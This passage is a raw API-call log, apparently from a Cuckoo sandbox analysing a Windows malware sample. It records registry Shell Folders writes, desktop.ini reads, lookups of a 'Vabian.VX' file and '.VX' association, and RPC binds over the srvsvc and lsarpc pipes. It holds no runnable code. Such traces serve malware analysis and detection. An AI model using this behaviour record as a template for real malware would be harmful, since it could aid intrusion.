SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020a |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS\Vabian.VX |
SUCCESS | 0x00193e98 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000208 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000208 DataLength => 4 ValueName => AllowFileCLSIDJunctions Type => 1299648 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000208 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Personal |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Personal Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoInitializeEx FunctionAddress => 0x774fef7b ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\My Documents |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 66 FunctionName => FunctionAddress => 0x7c9f063c ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 100 FunctionName => FunctionAddress => 0x7c9ec059 ModuleHandle => 0x7c9c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c DataLength => 4 ValueName => UseDesktopIniCache Type => 1293620 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x0000020c FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoUninitialize FunctionAddress => 0x774fee46 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Common Documents |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x0000020c Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\x00\x00 ValueName => Common Documents Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x0000020c SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x000001fc FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x000001fc FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtQueryInformationFile |
FileHandle => 0x000001fc FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Desktop |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x000001fc Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x000001fc Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Desktop Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x000001fc SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\Desktop |
SUCCESS | 0x001ae678 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => %\x00A\x00L\x00L\x00U\x00S\x00E\x00R\x00S\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Common Desktop |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCreateKeyExW |
Handle => 0x0000020c Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegSetValueExW |
Handle => 0x0000020c Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00e\x00s\x00k\x00t\x00o\x00p\x00\x00\x00 ValueName => Common Desktop Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x0000020c SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x000001fc Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x000001fc |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Desktop |
SUCCESS | 0x001af608 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x000001fc Registry => 0x00000200 SubKey => FileExts |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x000001fc SubKey => .VX |
FAILURE | 0x00000002 | 1 time |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 326 FunctionName => FunctionAddress => 0x773e0cc1 ModuleHandle => 0x773d0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x0000020e Registry => 0x80000000 SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x0000020e Data => V\x00X\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000212 Registry => 0x80000000 SubKey => VXFile |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000212 SubKey => CurVer |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000216 Registry => 0x00000212 SubKey => |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000212 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoTaskMemFree FunctionAddress => 0x774fd044 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000216 SubKey => ShellEx\IconHandler |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000000 SubKey => SystemFileAssociations\.VX |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000212 Registry => 0x80000000 SubKey => .VX |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000212 DataLength => 80 ValueName => PerceivedType Type => 1299628 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000212 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => DocObject Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => BrowseInPlace Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000216 SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000212 Registry => 0x80000000 SubKey => * |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000212 SubKey => Clsid |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => IsShortcut Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => AlwaysShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegQueryValueExW |
Handle => 0x00000216 DataLength => 0 ValueName => NeverShowExt Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x0000020e |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000216 |
SUCCESS | 0x00000000 | |
| 19:40:26,443 | 252 | RegCloseKey |
Handle => 0x00000212 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrLoadDll |
Flags => 1302512 BaseAddress => 0x76980000 FileName => LINKINFO.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CreateLinkInfoW FunctionAddress => 0x769818e6 ModuleHandle => 0x76980000 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtOpenFile |
ShareAccess => 3 FileName => C:\ DesiredAccess => 0x00100001 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtQueryInformationFile |
FileHandle => 0x00000214 FileInformation => \x02\x00\x00\x00\\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\srvsvc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtSetInformationFile |
FileHandle => 0x0000020c FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,453 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xc8O2Kp\x16\xd3\x01\x12xZG\xbfn\xe1\x88\x03\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x9b&\x00\x00
\x00\PIPE\srvsvc\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000002 SubKey => System\CurrentControlSet\Control\ProductOptions |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegQueryValueExW |
Handle => 0x0000020c Data => W\x00i\x00n\x00N\x00T\x00\x00\x00 ValueName => ProductType |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegOpenKeyExW |
Handle => 0x0000020c Registry => 0x80000002 SubKey => System\CurrentControlSet\Services\LanmanServer\DefaultSecurity |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | RegQueryValueExW |
Handle => 0x0000020c DataLength => 0 ValueName => SrvsvcDefaultShareInfo Type => 0 |
FAILURE | 0x00000002 | |
| 19:40:26,453 | 252 | RegCloseKey |
Handle => 0x0000020c |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
ShareAccess => 3 FileName => PIPE\lsarpc DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtSetInformationFile |
FileHandle => 0x00000214 FileInformation => |
SUCCESS | 0x00000000 | 1 time |
| 19:40:26,453 | 252 | NtWriteFile |
Buffer => \x05\x00\x0b\x03\x10\x00\x00\x00H\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00xW4\x124\x12\xcd\xab\xef\x00\x01#Eg\x89\xab\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtReadFile |
Buffer => \x05\x00\x0c\x03\x10\x00\x00\x00D\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\xff$\x00\x00\x0c\x00\PIPE\lsass\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x04]\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00+\x10H`\x02\x00\x00\x00 FileHandle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,453 | 252 | NtCreateFile |
